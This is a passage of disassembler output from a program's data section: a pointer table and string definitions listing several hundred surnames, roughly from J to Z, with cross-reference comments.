dd offset aJorgensen ; "Jorgensen"
dd offset aJucks ; "Jucks"
dd offset aJuliano ; "Juliano"
dd offset aJulious ; "Julious"
dd offset aKabbash ; "Kabbash"
dd offset aKaboolian ; "Kaboolian"
dd offset aKafadar ; "Kafadar"
dd offset aKalbfleisch ; "Kalbfleisch"
dd offset aKaligian ; "Kaligian"
dd offset aKalil ; "Kalil"
dd offset aKalinowski ; "Kalinowski"
dd offset aKalman ; "Kalman"
dd offset aKamel ; "Kamel"
dd offset aKangis ; "Kangis"
dd offset aKarpouzes ; "Karpouzes"
dd offset aKassower ; "Kassower"
dd offset aKasten ; "Kasten"
dd offset aKawachi ; "Kawachi"
dd offset aKee ; "Kee"
dd offset aKeenan ; "Keenan"
dd offset aKeepper ; "Keepper"
dd offset aKeith ; "Keith"
dd offset aKelker ; "Kelker"
dd offset aKelsey ; "Kelsey"
dd offset aKempton ; "Kempton"
dd offset aKemsley ; "Kemsley"
dd offset aKendall ; "Kendall"
dd offset aKerry ; "Kerry"
dd offset aKeul ; "Keul"
dd offset aKhong ; "Khong"
dd offset aKimmel ; "Kimmel"
dd offset aKimmett ; "Kimmett"
dd offset aKimura ; "Kimura"
dd offset aKindall ; "Kindall"
dd offset aKinsley ; "Kinsley"
dd offset aKippenberger ; "Kippenberger"
dd offset aKirscht ; "Kirscht"
dd offset aKittridge ; "Kittridge"
dd offset aKleckner ; "Kleckner"
dd offset aKleiman ; "Kleiman"
dd offset aKleinfelder ; "Kleinfelder"
dd offset aKlemperer ; "Klemperer"
dd offset aKling ; "Kling"
dd offset aKlinkenborg ; "Klinkenborg"
dd offset aKlint ; "Klint"
dd offset aKnuff ; "Knuff"
dd offset aKobrick ; "Kobrick"
dd offset aKoch ; "Koch"
dd offset aKohn ; "Kohn"
dd offset aKoivumaki ; "Koivumaki"
dd offset aKommer ; "Kommer"
dd offset aKoniaris ; "Koniaris"
dd offset aKonrad ; "Konrad"
dd offset aKool ; "Kool"
dd offset aKorzybski ; "Korzybski"
dd offset aKotter ; "Kotter"
dd offset aKovaks ; "Kovaks"
dd offset aKraemer ; "Kraemer"
dd offset aKrailo ; "Krailo"
dd offset aKrasney ; "Krasney"
dd offset aKraus ; "Kraus"
dd offset aKroemer ; "Kroemer"
dd offset aKrysiak ; "Krysiak"
dd offset aKuenzli ; "Kuenzli"
dd offset aKumar ; "Kumar"
dd offset aKusman ; "Kusman"
dd offset aKuwabara ; "Kuwabara"
dd offset aLa ; "La"
dd offset aLabunka ; "Labunka"
dd offset aLafler ; "Lafler"
dd offset aLaing ; "Laing"
dd offset aLallemant ; "Lallemant"
dd offset aLandes ; "Landes"
dd offset aLankes ; "Lankes"
dd offset aLantieri ; "Lantieri"
dd offset aLanzit ; "Lanzit"
dd offset aLaserna ; "Laserna"
dd offset aLashley ; "Lashley"
dd offset aLawless ; "Lawless"
dd offset aLecar ; "Lecar"
dd offset aLecce ; "Lecce"
dd offset aLeclercq ; "Leclercq"
dd offset aLeite ; "Leite"
dd offset aLenard ; "Lenard"
dd offset aLEnclos ; "l'Enclos"
dd offset aLesser ; "Lesser"
dd offset aLessi ; "Lessi"
dd offset aLiakos ; "Liakos"
dd offset aLidano ; "Lidano"
dd offset aLiem ; "Liem"
dd offset aLight ; "Light"
dd offset aLightfoot ; "Lightfoot"
dd offset aLim ; "Lim"
dd offset aLinares ; "Linares"
dd offset aLinda ; "Linda"
dd offset aLinder ; "Linder"
dd offset aLine ; "Line"
dd offset aLinehan ; "Linehan"
dd offset aLinzee ; "Linzee"
dd offset aLippmann ; "Lippmann"
dd offset aLipponen ; "Lipponen"
dd offset aLittle ; "Little"
dd offset aLitvak ; "Litvak"
dd offset aLivernash ; "Livernash"
dd offset aLivi ; "Livi"
dd offset aLivolsi ; "Livolsi"
dd offset aLizardo ; "Lizardo"
dd offset aLocatelli ; "Locatelli"
dd offset aLongworth ; "Longworth"
dd offset aLoss ; "Loss"
dd offset aLoveman ; "Loveman"
dd offset aLowenstein ; "Lowenstein"
dd offset aLoza ; "Loza"
dd offset aLubin ; "Lubin"
dd offset aLucas ; "Lucas"
dd offset aLuciano ; "Luciano"
dd offset aLuczkow ; "Luczkow"
dd offset aLuecke ; "Luecke"
dd offset aLunetta ; "Lunetta"
dd offset aLuoma ; "Luoma"
dd offset aLussier ; "Lussier"
dd offset aLutcavage ; "Lutcavage"
dd offset aLuzader ; "Luzader"
dd offset aMa ; "Ma"
dd offset aMaccormac ; "Maccormac"
dd offset aMacdonald ; "Macdonald"
dd offset aMaceachern ; "Maceachern"
dd offset aMacintyre ; "Macintyre"
dd offset aMackenney ; "Mackenney"
dd offset aMacmillan ; "MacMillan"
dd offset aMacy ; "Macy"
dd offset aMadigan ; "Madigan"
dd offset aMaggio ; "Maggio"
dd offset aMahony ; "Mahony"
dd offset aMaier ; "Maier"
dd offset aMaineHershey ; "Maine-Hershey"
dd offset aMaisano ; "Maisano"
dd offset aMalatesta ; "Malatesta"
dd offset aMaller ; "Maller"
dd offset aMalova ; "Malova"
dd offset aManalis ; "Manalis"
dd offset aMandel ; "Mandel"
dd offset aManganiello ; "Manganiello"
dd offset aMantovan ; "Mantovan"
dd offset aMarch ; "March"
dd offset aMarchbanks ; "Marchbanks"
dd offset aMarcus ; "Marcus"
dd offset aMargalit ; "Margalit"
dd offset aMargetts ; "Margetts"
dd offset aMarques ; "Marques"
dd offset aMartinez ; "Martinez"
dd offset aMartochio ; "Martochio"
dd offset aMarton ; "Marton"
dd offset aMarubini ; "Marubini"
dd offset aMass ; "Mass"
dd offset aMatalka ; "Matalka"
dd offset aMatarazzo ; "Matarazzo"
dd offset aMatsukata ; "Matsukata"
dd offset aMattson ; "Mattson"
dd offset aMauzy ; "Mauzy"
dd offset aMay ; "May"
dd offset aMazzali ; "Mazzali"
dd offset aMazziotta ; "Mazziotta"
dd offset aMcbride ; "Mcbride"
dd offset aMccaffery ; "Mccaffery"
dd offset aMccall ; "Mccall"
dd offset aMcclearn ; "Mcclearn"
dd offset aMcdowell ; "Mcdowell"
dd offset aMcelroy ; "Mcelroy"
dd offset aMcfadden ; "McFadden"
dd offset aMcghee ; "Mcghee"
dd offset aMcgoldrick ; "Mcgoldrick"
dd offset aMcilroy ; "McIlroy"
dd offset aMcintosh ; "Mcintosh"
dd offset aMckenna ; "Mckenna"
dd offset aMclane ; "Mclane"
dd offset aMclaren ; "Mclaren"
dd offset aMcnealy ; "Mcnealy"
dd offset aMcnulty ; "Mcnulty"
dd offset aMeccariello ; "Meccariello"
dd offset aMemisoglu ; "Memisoglu"
dd offset aMenzies ; "Menzies"
dd offset aMerikoski ; "Merikoski"
dd offset aMerlani ; "Merlani"
dd offset aMerminod ; "Merminod"
dd offset aMerseth ; "Merseth"
dd offset aMerz ; "Merz"
dd offset aMetelka ; "Metelka"
dd offset aMetropolis ; "Metropolis"
dd offset aMeurer ; "Meurer"
dd offset aMichelman ; "Michelman"
dd offset aMiddle ; "Middle"
dd offset aMieher ; "Mieher"
dd offset aMills ; "Mills"
dd offset aMinh ; "Minh"
dd offset aMini ; "Mini"
dd offset aMinichiello ; "Minichiello"
dd offset aGonzalez ; "Gonzalez"
dd offset aMitropoulos ; "Mitropoulos"
dd offset aMittal ; "Mittal"
dd offset aMocroft ; "Mocroft"
dd offset aModestino ; "Modestino"
dd offset aMoeller ; "Moeller"
dd offset aMohr ; "Mohr"
dd offset aMoiamedi ; "Moiamedi"
dd offset aMonque ; "Monque"
dd offset aMontilio ; "Montilio"
dd offset aMooredech_ ; "MooreDeCh."
dd offset aMorani ; "Morani"
dd offset aMoreton ; "Moreton"
dd offset aMorrison ; "Morrison"
dd offset aMorrow ; "Morrow"
dd offset aMortimer ; "Mortimer"
dd offset aMosher ; "Mosher"
dd offset aMosler ; "Mosler"
dd offset aMostafavi ; "Mostafavi"
dd offset aMotooka ; "Motooka"
dd offset aMudarri ; "Mudarri"
dd offset aMuello ; "Muello"
dd offset aMugnai ; "Mugnai"
dd offset aMulkern ; "Mulkern"
dd offset aMulroy ; "Mulroy"
dd offset aMumford ; "Mumford"
dd offset aMussachio ; "Mussachio"
dd offset aNaddeo ; "Naddeo"
dd offset aNapolitano ; "Napolitano"
dd offset aNardi ; "Nardi"
dd offset aNardone ; "Nardone"
dd offset aNaviaux ; "Naviaux"
dd offset aNayduch ; "Nayduch"
dd offset aNelson ; "Nelson"
dd offset aNenna ; "Nenna"
dd offset aNesci ; "Nesci"
dd offset aNeuman ; "Neuman"
dd offset aNewfeld ; "Newfeld"
dd offset aNewlin ; "Newlin"
dd offset aNg ; "Ng"
dd offset aNi_0 ; "Ni"
dd offset aNickerson ; "Nickerson"
dd offset aNickoloff ; "Nickoloff"
dd offset aNisenson ; "Nisenson"
dd offset aNitabach ; "Nitabach"
dd offset aNotman ; "Notman"
dd offset aNuzum ; "Nuzum"
dd offset aOcougne ; "Ocougne"
dd offset aOgata ; "Ogata"
dd offset aOh ; "Oh"
dd offset aOHagan ; "O'hagan"
dd offset aOldford ; "Oldford"
dd offset aOlsen ; "Olsen"
dd offset aOlson ; "Olson"
dd offset aOlszewski ; "Olszewski"
dd offset aOMalley ; "O'malley"
dd offset aOman ; "Oman"
dd offset aOMeara ; "O'meara"
dd offset aOpel ; "Opel"
dd offset aOray ; "Oray"
dd offset aOrfield ; "Orfield"
dd offset aOrsi ; "Orsi"
dd offset aOspina ; "Ospina"
dd offset aOstrowski ; "Ostrowski"
dd offset aOttaviani ; "Ottaviani"
dd offset aOtten ; "Otten"
dd offset aOuchida ; "Ouchida"
dd offset aOvid ; "Ovid"
dd offset aPaesdealmeida ; "PaesDealmeida"
dd offset aPaine ; "Paine"
dd offset aPalayoor ; "Palayoor"
dd offset aPalepu ; "Palepu"
dd offset aPallara ; "Pallara"
dd offset aPalmitesta ; "Palmitesta"
dd offset aPanadero ; "Panadero"
dd offset aPanizzon ; "Panizzon"
dd offset aPantilla ; "Pantilla"
dd offset aPaoletti ; "Paoletti"
dd offset aParmeggiani ; "Parmeggiani"
dd offset aParris ; "Parris"
dd offset aPartridge ; "Partridge"
dd offset aPascucci ; "Pascucci"
dd offset aPatefield ; "Patefield"
dd offset aPatrick ; "Patrick"
dd offset aPattullo ; "Pattullo"
dd offset aPavetti ; "Pavetti"
dd offset aPavlon ; "Pavlon"
dd offset aPawloski ; "Pawloski"
dd offset aPaynter ; "Paynter"
dd offset aPeabody ; "Peabody"
dd offset aPearlberg ; "Pearlberg"
dd offset aPederson ; "Pederson"
dd offset aPeishel ; "Peishel"
dd offset aPenny ; "Penny"
dd offset aPereira ; "Pereira"
dd offset aPerko ; "Perko"
dd offset aPerlak ; "Perlak"
dd offset aPerlman ; "Perlman"
dd offset aPerna ; "Perna"
dd offset aPerone ; "Perone"
dd offset aPerrimon ; "Perrimon"
dd offset aPeters ; "Peters"
dd offset aPetruzello ; "Petruzello"
dd offset aPettibone ; "Pettibone"
dd offset aPettit ; "Pettit"
dd offset aPfister ; "Pfister"
dd offset aPilbeam ; "Pilbeam"
dd offset aPinot ; "Pinot"
dd offset aPlancon ; "Plancon"
dd offset aPlant ; "Plant"
dd offset aPlasket ; "Plasket"
dd offset aPlous ; "Plous"
dd offset aPo ; "Po"
dd offset aPocobene ; "Pocobene"
dd offset aPoincaire ; "Poincaire"
dd offset aPointer ; "Pointer"
dd offset aPoirier ; "Poirier"
dd offset aPolak ; "Polak"
dd offset aPolanyi ; "Polanyi"
dd offset aPolitis ; "Politis"
dd offset aPoma ; "Poma"
dd offset aPoolman ; "Poolman"
dd offset aPowers ; "Powers"
dd offset aPresper ; "Presper"
dd offset aPreucel ; "Preucel"
dd offset aPrevost ; "Prevost"
dd offset aPritchard ; "Pritchard"
dd offset aPritz ; "Pritz"
dd offset aProietti ; "Proietti"
dd offset aProthrowStith ; "Prothrow-Stith"
dd offset aPuccia ; "Puccia"
dd offset aPugh ; "Pugh"
dd offset aPynchon ; "Pynchon"
dd offset aQuaday ; "Quaday"
dd offset aQuetin ; "Quetin"
dd offset aRabe ; "Rabe"
dd offset aRabkin ; "Rabkin"
dd offset aRadeke ; "Radeke"
dd offset aRajagopalan ; "Rajagopalan"
dd offset aRaney ; "Raney"
dd offset aRangan ; "Rangan"
dd offset aRankin ; "Rankin"
dd offset aRapple ; "Rapple"
dd offset aRayport ; "Rayport"
dd offset aReddenTyler ; "Redden-Tyler"
dd offset aReedquist ; "Reedquist"
dd offset aCunningham ; "Cunningham"
dd offset aReinold ; "Reinold"
dd offset aRemak ; "Remak"
dd offset aRenick ; "Renick"
dd offset aRepetto ; "Repetto"
dd offset aResnik ; "Resnik"
dd offset aRhea ; "Rhea"
dd offset aRichmond ; "Richmond"
dd offset aRielly ; "Rielly"
dd offset aRindos ; "Rindos"
dd offset aRineer ; "Rineer"
dd offset aRish ; "Rish"
dd offset aRivera ; "Rivera"
dd offset aRobinson ; "Robinson"
dd offset aRocha ; "Rocha"
dd offset aRoesler ; "Roesler"
dd offset aRogers ; "Rogers"
dd offset aRonen ; "Ronen"
dd offset aRow ; "Row"
dd offset aRoyal ; "Royal"
dd offset aRu ; "Ru"
dd offset aRuan ; "Ruan"
dd offset aRuderman ; "Ruderman"
dd offset aRuescher ; "Ruescher"
dd offset aRush ; "Rush"
dd offset aRyu ; "Ryu"
dd offset aSabatello ; "Sabatello"
dd offset aSadler ; "Sadler"
dd offset aSafire ; "Safire"
dd offset aSahu ; "Sahu"
dd offset aSali ; "Sali"
dd offset aSamson ; "Samson"
dd offset aSanchezRamirez ; "Sanchez-Ramirez"
dd offset aSanna ; "Sanna"
dd offset aSapers ; "Sapers"
dd offset aSarin ; "Sarin"
dd offset aSartore ; "Sartore"
dd offset aSase ; "Sase"
dd offset aSatin ; "Satin"
dd offset aSatta ; "Satta"
dd offset aSatterthwaite ; "Satterthwaite"
dd offset aSawtell ; "Sawtell"
dd offset aSayied ; "Sayied"
dd offset aScarponi ; "Scarponi"
dd offset aScepan ; "Scepan"
dd offset aScharf ; "Scharf"
dd offset aScharlemann ; "Scharlemann"
dd offset aScheiner ; "Scheiner"
dd offset aSchiano ; "Schiano"
dd offset aSchifini ; "Schifini"
dd offset aSchilling ; "Schilling"
dd offset aSchmitt ; "Schmitt"
dd offset aSchossberger ; "Schossberger"
dd offset aSchuman ; "Schuman"
dd offset aSchutte ; "Schutte"
dd offset aSchuyler ; "Schuyler"
dd offset aSchwan ; "Schwan"
dd offset aSchwickrath ; "Schwickrath"
dd offset aScovel ; "Scovel"
dd offset aScudder ; "Scudder"
dd offset aSeaton ; "Seaton"
dd offset aSeeber ; "Seeber"
dd offset aSegal ; "Segal"
dd offset aSekler ; "Sekler"
dd offset aSelvage ; "Selvage"
dd offset aSen ; "Sen"
dd offset aSennett ; "Sennett"
dd offset aSeterdahl ; "Seterdahl"
dd offset aSexton ; "Sexton"
dd offset aSeyfert ; "Seyfert"
dd offset aShaikh ; "Shaikh"
dd offset aShakis ; "Shakis"
dd offset aShankland ; "Shankland"
dd offset aShanley ; "Shanley"
dd offset aShar ; "Shar"
dd offset aShatrov ; "Shatrov"
dd offset aShavelson ; "Shavelson"
dd offset aShea ; "Shea"
dd offset aSheats ; "Sheats"
dd offset aShepherd ; "Shepherd"
dd offset aSheppard ; "Sheppard"
dd offset aShepstone ; "Shepstone"
dd offset aShesko ; "Shesko"
dd offset aShia ; "Shia"
dd offset aShibata ; "Shibata"
dd offset aShimon ; "Shimon"
dd offset aSiesto ; "Siesto"
dd offset aSigalot ; "Sigalot"
dd offset aSigini ; "Sigini"
dd offset aSigna ; "Signa"
dd offset aSilverman ; "Silverman"
dd offset aSilvetti ; "Silvetti"
dd offset aSinsabaugh ; "Sinsabaugh"
dd offset aSirilli ; "Sirilli"
dd offset aSites ; "Sites"
dd offset aSkane ; "Skane"
dd offset aSkerry ; "Skerry"
dd offset aSkoda ; "Skoda"
dd offset aSloan ; "Sloan"
dd offset aSlowe ; "Slowe"
dd offset aSmilow ; "Smilow"
dd offset aSniffen ; "Sniffen"
dd offset aSnodgrass ; "Snodgrass"
dd offset aSocolow ; "Socolow"
dd offset aSolon ; "Solon"
dd offset aSomers ; "Somers"
dd offset aSommariva ; "Sommariva"
dd offset aSorabella ; "Sorabella"
dd offset aSorg ; "Sorg"
dd offset aSottak ; "Sottak"
dd offset aSoukup ; "Soukup"
dd offset aSoule ; "Soule"
dd offset aSoultanian ; "Soultanian"
dd offset aSpanier ; "Spanier"
dd offset aSparrow ; "Sparrow"
dd offset aSpaulding ; "Spaulding"
dd offset aSpeizer ; "Speizer"
dd offset aSpence ; "Spence"
dd offset aSperber ; "Sperber"
dd offset aSpicer ; "Spicer"
dd offset aSpiegelhalter ; "Spiegelhalter"
dd offset aSpiliotis ; "Spiliotis"
dd offset aSpinrad ; "Spinrad"
dd offset aStmartin ; "StMartin"
dd offset aStalvey ; "Stalvey"
dd offset aStam ; "Stam"
dd offset aStang ; "Stang"
dd offset aStassinopolus ; "Stassinopolus"
dd offset aStates ; "States"
dd offset aStatlender ; "Statlender"
dd offset aStefani ; "Stefani"
dd offset aSteiner ; "Steiner"
dd offset aStephanian ; "Stephanian"
dd offset aStepniewska ; "Stepniewska"
dd offset aStewartOaten ; "Stewart-Oaten"
dd offset aStiepock ; "Stiepock"
dd offset aStillwell ; "Stillwell"
dd offset aStock ; "Stock"
dd offset aStockton ; "Stockton"
dd offset aStockwell ; "Stockwell"
dd offset aStolzenberg ; "Stolzenberg"
dd offset aStonich ; "Stonich"
dd offset aStorer ; "Storer"
dd offset aStott ; "Stott"
dd offset aStrange ; "Strange"
dd offset aStrauch ; "Strauch"
dd offset aStreiff ; "Streiff"
dd offset aStringer ; "Stringer"
dd offset aSullivan ; "Sullivan"
dd offset aSumner ; "Sumner"
dd offset aSuo ; "Suo"
dd offset aSurdam ; "Surdam"
dd offset aSweeting ; "Sweeting"
dd offset aSweetser ; "Sweetser"
dd offset aSwindle ; "Swindle"
dd offset aTagiuri ; "Tagiuri"
dd offset aTai ; "Tai"
dd offset aTalaugon ; "Talaugon"
dd offset aTambiah ; "Tambiah"
dd offset aTandler ; "Tandler"
dd offset aTanowitz ; "Tanowitz"
dd offset aTatar ; "Tatar"
dd offset aTaveras ; "Taveras"
dd offset aTawn ; "Tawn"
dd offset aTcherepnin ; "Tcherepnin"
dd offset aTeague ; "Teague"
dd offset aTemes ; "Temes"
dd offset aTemmer ; "Temmer"
dd offset aTenney ; "Tenney"
dd offset aTerracini ; "Terracini"
dd offset aThan ; "Than"
dd offset aThavaneswaran ; "Thavaneswaran"
dd offset aTheodos ; "Theodos"
dd offset aThibault ; "Thibault"
dd offset aThisted ; "Thisted"
dd offset aThomsen ; "Thomsen"
dd offset aThroop ; "Throop"
dd offset aTierney ; "Tierney"
dd offset aTill ; "Till"
dd offset aTimmons ; "Timmons"
dd offset aTofallis ; "Tofallis"
dd offset aTollestrup ; "Tollestrup"
dd offset aTolls ; "Tolls"
dd offset aTolman ; "Tolman"
dd offset aTomford ; "Tomford"
dd offset aToomer ; "Toomer"
dd offset aTopulos ; "Topulos"
dd offset aTorresi ; "Torresi"
dd offset aTorske ; "Torske"
dd offset aTowler ; "Towler"
dd offset aToye ; "Toye"
dd offset aTraebert ; "Traebert"
dd offset aTrenga ; "Trenga"
dd offset aTrewin ; "Trewin"
dd offset aTringali ; "Tringali"
dd offset aTroiani ; "Troiani"
dd offset aTroy ; "Troy"
dd offset aTruss ; "Truss"
dd offset aTsiatis ; "Tsiatis"
dd offset aTsomides ; "Tsomides"
dd offset aTsukurov ; "Tsukurov"
dd offset aTuck ; "Tuck"
dd offset aTudge ; "Tudge"
dd offset aTukan ; "Tukan"
dd offset aTurano ; "Turano"
dd offset aTurek ; "Turek"
dd offset aTuttle ; "Tuttle"
dd offset aTwells ; "Twells"
dd offset aTzamarias ; "Tzamarias"
dd offset aUllman ; "Ullman"
dd offset aUntermeyer ; "Untermeyer"
dd offset aUpsdell ; "Upsdell"
dd offset aUrban ; "Urban"
dd offset aUrdangBrown ; "Urdang-Brown"
dd offset aUsdan ; "Usdan"
dd offset aUzuner ; "Uzuner"
dd offset aVacca ; "Vacca"
dd offset aWaite ; "Waite"
dd offset aValberg ; "Valberg"
dd offset aValencia ; "Valencia"
dd offset aWales ; "Wales"
dd offset aWallenberg ; "Wallenberg"
dd offset aWalter ; "Walter"
dd offset aVanallen ; "vanAllen"
dd offset aVanzwet ; "VanZwet"
dd offset aVandenberg ; "Vandenberg"
dd offset aVanheeckeren ; "Vanheeckeren"
dd offset aWarshafsky ; "Warshafsky"
dd offset aWasowska ; "Wasowska"
dd offset aVasquez ; "Vasquez"
dd offset aWaugh ; "Waugh"
dd offset aWeighart ; "Weighart"
dd offset aWeingarten ; "Weingarten"
dd offset aWeinhaus ; "Weinhaus"
dd offset aWeissbourd ; "Weissbourd"
dd offset aWeissman ; "Weissman"
dd offset aVelasquez ; "Velasquez"
dd offset aWelles ; "Welles"
dd offset aWelsh ; "Welsh"
dd offset aWengret ; "Wengret"
dd offset aVenne ; "Venne"
dd offset aVerghese ; "Verghese"
dd offset aWescott ; "Wescott"
dd offset aWetzel ; "Wetzel"
dd offset aWhately ; "Whately"
dd offset aWhilton ; "Whilton"
dd offset aWhite ; "White"
dd offset aWhitla ; "Whitla"
dd offset aWhittaker ; "Whittaker"
dd offset aViana ; "Viana"
dd offset aViano ; "Viano"
dd offset aWiedersheim ; "Wiedersheim"
dd offset aWiener ; "Wiener"
dd offset aViens ; "Viens"
dd offset aVignola ; "Vignola"
dd offset aWilder ; "Wilder"
dd offset aWilhelm ; "Wilhelm"
dd offset aWilk ; "Wilk"
dd offset aWilkin ; "Wilkin"
dd offset aWilkinson ; "Wilkinson"
dd offset aVillarreal ; "Villarreal"
dd offset aWillstatter ; "Willstatter"
dd offset aWilson ; "Wilson"
dd offset aVitali ; "Vitali"
dd offset aViviani ; "Viviani"
dd offset aVoigt ; "Voigt"
dd offset aWolk ; "Wolk"
dd offset aVonhoffman ; "VonHoffman"
dd offset aWoo ; "Woo"
dd offset aWooden ; "Wooden"
dd offset aWoods ; "Woods"
dd offset aWoodsPowell ; "Woods-Powell"
dd offset aVorhaus ; "Vorhaus"
dd offset aVotey ; "Votey"
dd offset aYacono ; "Yacono"
dd offset aYamane ; "Yamane"
dd offset aYankee ; "Yankee"
dd offset aYarchuk ; "Yarchuk"
dd offset aYates ; "Yates"
dd offset aYbarra ; "Ybarra"
dd offset aYedidia ; "Yedidia"
dd offset aYesson ; "Yesson"
dd offset aYetiv ; "Yetiv"
dd offset aYoffe ; "Yoffe"
dd offset aYoo ; "Yoo"
dd offset aYoukSee ; "Youk-See"
dd offset aYu ; "Yu"
dd offset aZachary ; "Zachary"
dd offset aZahedi ; "Zahedi"
dd offset aZangwill ; "Zangwill"
dd offset aZegans ; "Zegans"
dd offset aZerbini ; "Zerbini"
dd offset aZoldak ; "Zoldak"
dd offset aZucconi ; "Zucconi"
dd offset aZurn ; "Zurn"
dd offset aZwiers ; "Zwiers"
dd offset aZytowski ; "Zytowski"
aZytowski db 'Zytowski',0 ; DATA XREF: .data:0042EBD4�o
align 4
aZwiers db 'Zwiers',0 ; DATA XREF: .data:0042EBD0�o
align 4
aZurn db 'Zurn',0 ; DATA XREF: .data:0042EBCC�o
align 4
aZucconi db 'Zucconi',0 ; DATA XREF: .data:0042EBC8�o
aZoldak db 'Zoldak',0 ; DATA XREF: .data:0042EBC4�o
align 4
aZerbini db 'Zerbini',0 ; DATA XREF: .data:0042EBC0�o
aZegans db 'Zegans',0 ; DATA XREF: .data:0042EBBC�o
align 4
aZangwill db 'Zangwill',0 ; DATA XREF: .data:0042EBB8�o
align 10h
aZahedi db 'Zahedi',0 ; DATA XREF: .data:0042EBB4�o
align 4
aZachary db 'Zachary',0 ; DATA XREF: .data:0042EBB0�o
aYu db 'Yu',0 ; DATA XREF: .data:0042EBAC�o
align 4
aYoukSee db 'Youk-See',0 ; DATA XREF: .data:0042EBA8�o
align 10h
aYoo db 'Yoo',0 ; DATA XREF: .data:0042EBA4�o
aYoffe db 'Yoffe',0 ; DATA XREF: .data:0042EBA0�o
align 4
aYetiv db 'Yetiv',0 ; DATA XREF: .data:0042EB9C�o
align 4
aYesson db 'Yesson',0 ; DATA XREF: .data:0042EB98�o
align 4
aYedidia db 'Yedidia',0 ; DATA XREF: .data:0042EB94�o
aYbarra db 'Ybarra',0 ; DATA XREF: .data:0042EB90�o
align 4
aYates db 'Yates',0 ; DATA XREF: .data:0042EB8C�o
align 4
aYarchuk db 'Yarchuk',0 ; DATA XREF: .data:0042EB88�o
aYankee db 'Yankee',0 ; DATA XREF: .data:0042EB84�o
align 4
aYamane db 'Yamane',0 ; DATA XREF: .data:0042EB80�o
align 4
aYacono db 'Yacono',0 ; DATA XREF: .data:0042EB7C�o
align 4
aVotey db 'Votey',0 ; DATA XREF: .data:0042EB78�o
align 4
aVorhaus db 'Vorhaus',0 ; DATA XREF: .data:0042EB74�o
aWoodsPowell db 'Woods-Powell',0 ; DATA XREF: .data:0042EB70�o
align 4
aWoods db 'Woods',0 ; DATA XREF: .data:0042EB6C�o
align 4
aWooden db 'Wooden',0 ; DATA XREF: .data:0042EB68�o
align 4
aWoo db 'Woo',0 ; DATA XREF: .data:0042EB64�o
aVonhoffman db 'VonHoffman',0 ; DATA XREF: .data:0042EB60�o
align 4
aWolk db 'Wolk',0 ; DATA XREF: .data:0042EB5C�o
align 4
aVoigt db 'Voigt',0 ; DATA XREF: .data:0042EB58�o
align 4
aViviani db 'Viviani',0 ; DATA XREF: .data:0042EB54�o
aVitali db 'Vitali',0 ; DATA XREF: .data:0042EB50�o
align 4
aWilson db 'Wilson',0 ; DATA XREF: .data:0042EB4C�o
align 4
aWillstatter db 'Willstatter',0 ; DATA XREF: .data:0042EB48�o
aVillarreal db 'Villarreal',0 ; DATA XREF: .data:0042EB44�o
align 4
aWilkinson db 'Wilkinson',0 ; DATA XREF: .data:0042EB40�o
align 10h
aWilkin db 'Wilkin',0 ; DATA XREF: .data:0042EB3C�o
align 4
aWilk db 'Wilk',0 ; DATA XREF: .data:0042EB38�o
align 10h
aWilhelm db 'Wilhelm',0 ; DATA XREF: .data:0042EB34�o
aWilder db 'Wilder',0 ; DATA XREF: .data:0042EB30�o
align 10h
aVignola db 'Vignola',0 ; DATA XREF: .data:0042EB2C�o
aViens db 'Viens',0 ; DATA XREF: .data:0042EB28�o
align 10h
aWiener db 'Wiener',0 ; DATA XREF: .data:0042EB24�o
align 4
aWiedersheim db 'Wiedersheim',0 ; DATA XREF: .data:0042EB20�o
aViano db 'Viano',0 ; DATA XREF: .data:0042EB1C�o
align 4
aViana db 'Viana',0 ; DATA XREF: .data:0042EB18�o
align 4
aWhittaker db 'Whittaker',0 ; DATA XREF: .data:0042EB14�o
align 10h
aWhitla db 'Whitla',0 ; DATA XREF: .data:0042EB10�o
align 4
aWhite db 'White',0 ; DATA XREF: .data:0042EB0C�o
align 10h
aWhilton db 'Whilton',0 ; DATA XREF: .data:0042EB08�o
aWhately db 'Whately',0 ; DATA XREF: .data:0042EB04�o
aWetzel db 'Wetzel',0 ; DATA XREF: .data:0042EB00�o
align 4
aWescott db 'Wescott',0 ; DATA XREF: .data:0042EAFC�o
aVerghese db 'Verghese',0 ; DATA XREF: .data:0042EAF8�o
align 4
aVenne db 'Venne',0 ; DATA XREF: .data:0042EAF4�o
align 4
aWengret db 'Wengret',0 ; DATA XREF: .data:0042EAF0�o
aWelsh db 'Welsh',0 ; DATA XREF: .data:0042EAEC�o
align 4
aWelles db 'Welles',0 ; DATA XREF: .data:0042EAE8�o
align 4
aVelasquez db 'Velasquez',0 ; DATA XREF: .data:0042EAE4�o
align 4
aWeissman db 'Weissman',0 ; DATA XREF: .data:0042EAE0�o
align 4
aWeissbourd db 'Weissbourd',0 ; DATA XREF: .data:0042EADC�o
align 10h
aWeinhaus db 'Weinhaus',0 ; DATA XREF: .data:0042EAD8�o
align 4
aWeingarten db 'Weingarten',0 ; DATA XREF: .data:0042EAD4�o
align 4
aWeighart db 'Weighart',0 ; DATA XREF: .data:0042EAD0�o
align 4
aWaugh db 'Waugh',0 ; DATA XREF: .data:0042EACC�o
align 4
aVasquez db 'Vasquez',0 ; DATA XREF: .data:0042EAC8�o
aWasowska db 'Wasowska',0 ; DATA XREF: .data:0042EAC4�o
align 10h
aWarshafsky db 'Warshafsky',0 ; DATA XREF: .data:0042EAC0�o
align 4
aVanheeckeren db 'Vanheeckeren',0 ; DATA XREF: .data:0042EABC�o
align 4
aVandenberg db 'Vandenberg',0 ; DATA XREF: .data:0042EAB8�o
align 4
aVanzwet db 'VanZwet',0 ; DATA XREF: .data:0042EAB4�o
aVanallen db 'vanAllen',0 ; DATA XREF: .data:0042EAB0�o
align 4
aWalter db 'Walter',0 ; DATA XREF: .data:0042EAAC�o
align 4
aWallenberg db 'Wallenberg',0 ; DATA XREF: .data:0042EAA8�o
align 10h
aWales db 'Wales',0 ; DATA XREF: .data:0042EAA4�o
align 4
aValencia db 'Valencia',0 ; DATA XREF: .data:0042EAA0�o
align 4
aValberg db 'Valberg',0 ; DATA XREF: .data:0042EA9C�o
aWaite db 'Waite',0 ; DATA XREF: .data:0042EA98�o
align 4
aVacca db 'Vacca',0 ; DATA XREF: .data:0042EA94�o
align 4
aUzuner db 'Uzuner',0 ; DATA XREF: .data:0042EA90�o
align 4
aUsdan db 'Usdan',0 ; DATA XREF: .data:0042EA8C�o
align 4
aUrdangBrown db 'Urdang-Brown',0 ; DATA XREF: .data:0042EA88�o
align 4
aUrban db 'Urban',0 ; DATA XREF: .data:0042EA84�o
align 4
aUpsdell db 'Upsdell',0 ; DATA XREF: .data:0042EA80�o
aUntermeyer db 'Untermeyer',0 ; DATA XREF: .data:0042EA7C�o
